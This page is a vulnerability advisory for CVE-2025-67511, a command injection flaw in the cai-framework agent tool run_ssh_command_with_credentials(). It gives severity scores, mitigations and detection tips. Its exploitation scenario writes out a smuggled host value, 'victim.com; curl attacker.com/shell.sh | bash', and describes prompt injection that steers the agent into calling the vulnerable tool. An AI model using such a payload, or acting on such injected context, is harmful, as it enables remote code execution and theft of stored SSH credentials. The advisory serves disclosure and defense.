AI Threat Alert

CVE-2025-67511: cai-framework: Command Injection enables RCE

GHSA-4c65-9gqf-4w8h CRITICAL PoC AVAILABLE CISA: ATTEND
Published December 11, 2025
CISO Take

If your security operations team is using the CAI framework (cai-framework pip package <= 0.5.9), stop using it for automated SSH operations immediately — there is no official patch available. The critical risk here is a prompt injection chain: an adversary tricks the AI agent into calling the vulnerable SSH function with injected username/host/port values, achieving arbitrary command execution on the host running your security tooling. Verify your pip environment and pin or remove the package until a patched version ships.

What is the risk?

CVSS 9.6 Critical with network attack vector, zero privileges required, and low complexity makes this highly exploitable against any exposed CAI agent instance. The absence of a patch compounds the risk. Mitigating factor: EPSS 0.00158 indicates low current exploitation in the wild, and exploitation requires user interaction or agent invocation. However, the target is a security automation framework — compromise of a defensive security tool has amplified blast radius, as these systems typically hold credentials and have privileged access to production infrastructure.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
cai-framework pip <= 0.5.9 No patch
cybersecurity_ai No patch

How severe is it?

CVSS 3.1
9.6 / 10
EPSS
1.5%
chance of exploitation in 30 days
Higher than 71% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Changed
C High
I High
A High

What should I do?

5 steps

  1. IMMEDIATE

    Audit pip environments for cai-framework <= 0.5.9 across all systems. Run: pip show cai-framework.

  2. WORKAROUND

    Disable or remove run_ssh_command_with_credentials() from agent tool definitions if you cannot remove the package. Add input validation or allowlisting for username (alphanumeric only), host (IP/FQDN regex), and port (numeric 1-65535) at the wrapper level.

  3. PATCH

    Monitor the upstream commit 09ccb6e0baccf56c40e6cb429c698750843a999c and GHSA-4c65-9gqf-4w8h for an official release — the fix exists in source but has not been packaged.

  4. DETECTION

    Alert on anomalous process execution spawned by the CAI agent process. Look for shell metacharacters (;, |, &, $, backticks) in SSH connection parameters logged by the framework.

  5. CONTAINMENT

    Run CAI agents in isolated containers with restricted outbound network and minimal host privileges (no root, no credential store access).

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Prompt Injection Agent Framework AML.T0011.002 AML.T0049 AML.T0050 AML.T0051.001 AML.T0053 AML.T0072 AML.T0080

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
8.4 - AI system operation and monitoring A.9.3 - AI System Security Testing
NIST AI RMF
GOVERN-1.7 - Processes for decommissioning and oversight of AI systems GV-6.2 - AI System Security Practices MANAGE-2.4 - Residual risks are managed MS-2.5 - Risks from Third-Party AI Software and Dependencies
OWASP LLM Top 10
LLM01 - Prompt Injection LLM06 - Excessive Agency LLM07 - Insecure Plugin Design LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2025-67511?

If your security operations team is using the CAI framework (cai-framework pip package <= 0.5.9), stop using it for automated SSH operations immediately — there is no official patch available. The critical risk here is a prompt injection chain: an adversary tricks the AI agent into calling the vulnerable SSH function with injected username/host/port values, achieving arbitrary command execution on the host running your security tooling. Verify your pip environment and pin or remove the package until a patched version ships.

Is CVE-2025-67511 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-67511, increasing the risk of exploitation.

How to fix CVE-2025-67511?

1. IMMEDIATE: Audit pip environments for cai-framework <= 0.5.9 across all systems. Run: pip show cai-framework. 2. WORKAROUND: Disable or remove run_ssh_command_with_credentials() from agent tool definitions if you cannot remove the package. Add input validation or allowlisting for username (alphanumeric only), host (IP/FQDN regex), and port (numeric 1-65535) at the wrapper level. 3. PATCH: Monitor the upstream commit 09ccb6e0baccf56c40e6cb429c698750843a999c and GHSA-4c65-9gqf-4w8h for an official release — the fix exists in source but has not been packaged. 4. DETECTION: Alert on anomalous process execution spawned by the CAI agent process. Look for shell metacharacters (;, |, &, $, backticks) in SSH connection parameters logged by the framework. 5. CONTAINMENT: Run CAI agents in isolated containers with restricted outbound network and minimal host privileges (no root, no credential store access).

What systems are affected by CVE-2025-67511?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, security automation pipelines, AI-driven offensive security tools, CI/CD with AI-assisted testing.

What is the CVSS score for CVE-2025-67511?

CVE-2025-67511 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 1.52%.

What is the AI security impact?

Affected AI Architectures

agent frameworkssecurity automation pipelinesAI-driven offensive security toolsCI/CD with AI-assisted testing

MITRE ATLAS Techniques

AML.T0011.002 Poisoned AI Agent Tool
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0051.001 Indirect
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell
AML.T0080 AI Agent Context Poisoning

Compliance Controls Affected

EU AI Act: Art. 15, Article 15
ISO 42001: 8.4, A.9.3
NIST AI RMF: GOVERN-1.7, GV-6.2, MANAGE-2.4, MS-2.5
OWASP LLM Top 10: LLM01, LLM06, LLM07, LLM08

What are the technical details?

Original Advisory

Cybersecurity AI (CAI) is an open-source framework for building and deploying AI-powered offensive and defensive automation. Versions 0.5.9 and below are vulnerable to Command Injection through the run_ssh_command_with_credentials() function, which is available to AI agents. Only password and command inputs are escaped in run_ssh_command_with_credentials to prevent shell injection; while username, host and port values are injectable. This issue does not have a fix at the time of publication.

Exploitation Scenario

An adversary conducting a penetration test or red team engagement using CAI >= 0.5.9 targets a security operations team also running CAI. Step 1: Attacker crafts a malicious target hostname — e.g., 'victim.com; curl attacker.com/shell.sh | bash' — and delivers it through a channel the victim's CAI agent will process (phishing lure, poisoned scan target list, or indirect prompt injection via agent context). Step 2: The CAI agent invokes run_ssh_command_with_credentials() with the attacker-controlled host value. Step 3: Because host is not sanitized, the shell executes both the SSH command and the injected payload. Step 4: Attacker achieves RCE on the machine running the security team's AI agent, potentially inheriting all stored SSH credentials and access to internal networks the agent was managing.

Weaknesses (CWE)

CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection') Primary CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')

CWE-77 — Improper Neutralization of Special Elements used in a Command ('Command Injection'): The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Implementation] If possible, ensure that all external commands called from the program are statically created.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

References

Timeline

Published
December 11, 2025
Last Modified
March 17, 2026
First Seen
December 11, 2025

Related Vulnerabilities

CRITICAL CVE-2024-2912 10.0

BentoML: RCE via insecure deserialization (CVSS 10)

Same attack type: Code Execution
CRITICAL CVE-2026-21858 10.0

n8n: Input Validation flaw enables exploitation

Same attack type: Code Execution
CRITICAL CVE-2025-5120 10.0

smolagents: sandbox escape enables unauthenticated RCE

Same attack type: Code Execution
CRITICAL CVE-2025-59528 10.0

Flowise: Unauthenticated RCE via MCP config injection

Same attack type: Code Execution
CRITICAL GHSA-vvpj-8cmc-gx39 10.0

picklescan: security flaw enables exploitation

Same attack type: Code Execution
Back to Threat Feed